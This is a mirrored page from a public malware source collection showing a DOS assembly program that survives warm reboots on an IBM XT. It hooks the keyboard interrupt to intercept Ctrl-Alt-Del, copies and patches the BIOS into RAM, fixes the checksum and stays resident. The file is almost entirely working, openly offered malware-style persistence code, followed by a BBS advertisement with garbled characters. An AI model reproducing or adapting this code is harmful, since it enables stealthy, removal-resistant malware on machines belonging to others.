mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
4b9382ddbc
push
227 lines
4.8 KiB
NASM
227 lines
4.8 KiB
NASM
|
||
; Survive a warm reboot on a XT.
|
||
;
|
||
; Compile under Turbo Assembler 2.5
|
||
; This program works on a generic IBM PC/XT
|
||
|
||
|
||
.model tiny
|
||
.radix 16
|
||
.code
|
||
|
||
org 100
|
||
|
||
start:
|
||
jmp init
|
||
|
||
handler:
|
||
push ds
|
||
push ax
|
||
xor ax,ax
|
||
mov ds,ax
|
||
mov al,ds:[417]
|
||
and al,0c
|
||
cmp al,0c
|
||
jnz no_ctrl_alt
|
||
in al,[60]
|
||
cmp al,53
|
||
jz now_fuck
|
||
no_ctrl_alt:
|
||
pop ax
|
||
pop ds
|
||
db 0ea
|
||
oldvect dd ?
|
||
now_fuck:
|
||
mov ds:[472],1234
|
||
mov ax,ds:[413]
|
||
mov cx,6
|
||
shl ax,cl
|
||
push ax
|
||
mov es,ax
|
||
mov di,offset handler
|
||
push cs
|
||
pop ds
|
||
mov si,di
|
||
repz cmpsw
|
||
jnz new_move
|
||
mov dl,es:[top_seg]
|
||
pop ax
|
||
jmp short set_segm
|
||
new_move:
|
||
mov al,ah
|
||
cmp al,0a0
|
||
jnc set_top
|
||
mov al,0a0
|
||
set_top:
|
||
xchg ax,dx
|
||
pop ax
|
||
sub ax,1000
|
||
set_segm:
|
||
mov cs:[top_seg],dl
|
||
push ax
|
||
mov es,ax
|
||
mov di,0e000
|
||
mov ax,0f000
|
||
mov ds,ax
|
||
mov si,di
|
||
mov cx,1000
|
||
cld
|
||
rep movsw
|
||
cmp byte ptr [si-10],0ea
|
||
jnz cant_fuck
|
||
cmp [si-0dh],0f000
|
||
jnz cant_fuck
|
||
mov di,[si-0f]
|
||
cmp di,0e000
|
||
jc cant_fuck
|
||
mov al,[di]
|
||
cmp al,0e9
|
||
jnz no_jmp
|
||
add di,[di+1]
|
||
add di,3
|
||
no_jmp:
|
||
push di
|
||
mov cx,800
|
||
call protect_ram
|
||
call replace_ints
|
||
push es
|
||
pop ds
|
||
mov bx,0e000
|
||
mov cx,2000
|
||
xor al,al
|
||
check_lup:
|
||
add al,[bx]
|
||
inc bx
|
||
loop check_lup
|
||
neg al
|
||
mov [di-1],al
|
||
push cs
|
||
pop ds
|
||
mov word ptr ds:[tmp_handler],5ebh
|
||
mov si,offset start
|
||
mov di,si
|
||
mov cx,init-start
|
||
rep movsb
|
||
retf
|
||
cant_fuck:
|
||
db 0ea
|
||
dw 0
|
||
dw 0ffff
|
||
|
||
protect_ram:
|
||
jcxz cant_fuck
|
||
mov al,80
|
||
repnz scasb
|
||
jnz protect_ram
|
||
mov ax,[di]
|
||
and al,0f8
|
||
cmp al,0f8
|
||
jnz protect_ram
|
||
cmp ah,dl
|
||
jnz protect_ram
|
||
mov ax,es
|
||
mov es:[di+1],ah
|
||
ret
|
||
|
||
top_seg db ?
|
||
|
||
replace_ints:
|
||
jcxz cant_fuck
|
||
mov al,0a5
|
||
repnz scasb
|
||
jnz replace_ints
|
||
cmp [di],4747
|
||
jnz replace_ints
|
||
cmp [di+2],0fbe2
|
||
jnz replace_ints
|
||
add di,4
|
||
push cs
|
||
pop ds
|
||
mov [dummy],di
|
||
mov si,offset my_piece
|
||
mov cx,my_top-my_piece
|
||
rep movsb
|
||
exit_prn:
|
||
ret
|
||
|
||
my_piece:
|
||
push ax
|
||
mov cx,20
|
||
xor di,di
|
||
re_init:
|
||
scasw
|
||
mov ax,0f000
|
||
stosw
|
||
loop re_init
|
||
mov ax,offset tmp_handler
|
||
xchg ax,es:[di+44-80]
|
||
mov cs:[old_tmp],ax
|
||
mov ax,cs
|
||
xchg ax,es:[di+46-80]
|
||
mov cs:[old_tmp+2],ax
|
||
pop ax
|
||
db 0ea
|
||
dummy dw ?
|
||
dw 0f000
|
||
db 0
|
||
my_top:
|
||
|
||
print:
|
||
mov si,offset message
|
||
print_msg:
|
||
lodsb
|
||
cmp al,'$'
|
||
jz exit_prn
|
||
mov ah,0e
|
||
int 10
|
||
jmp print_msg
|
||
|
||
tmp_handler:
|
||
jmp $
|
||
go_old:
|
||
db 0ea
|
||
old_tmp dw ?
|
||
dw ?
|
||
push ds
|
||
push si
|
||
push ax
|
||
xor ax,ax
|
||
mov ds,ax
|
||
mov ax,offset handler
|
||
xchg ax,ds:[24]
|
||
mov word ptr cs:[oldvect],ax
|
||
mov ax,cs
|
||
xchg ax,ds:[26]
|
||
mov word ptr cs:[oldvect+2],ax
|
||
push cs
|
||
pop ds
|
||
mov word ptr [tmp_handler],9090
|
||
call print
|
||
pop ax
|
||
pop si
|
||
pop ds
|
||
jmp go_old
|
||
|
||
message:
|
||
db 'Never ending story...',0dh,0a,'$'
|
||
|
||
init:
|
||
mov ax,3509
|
||
int 21
|
||
mov word ptr [oldvect],bx
|
||
mov word ptr [oldvect+2],es
|
||
mov dx,offset handler
|
||
mov ah,25
|
||
int 21
|
||
call print
|
||
mov dx,offset init
|
||
int 27
|
||
|
||
end start
|
||
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|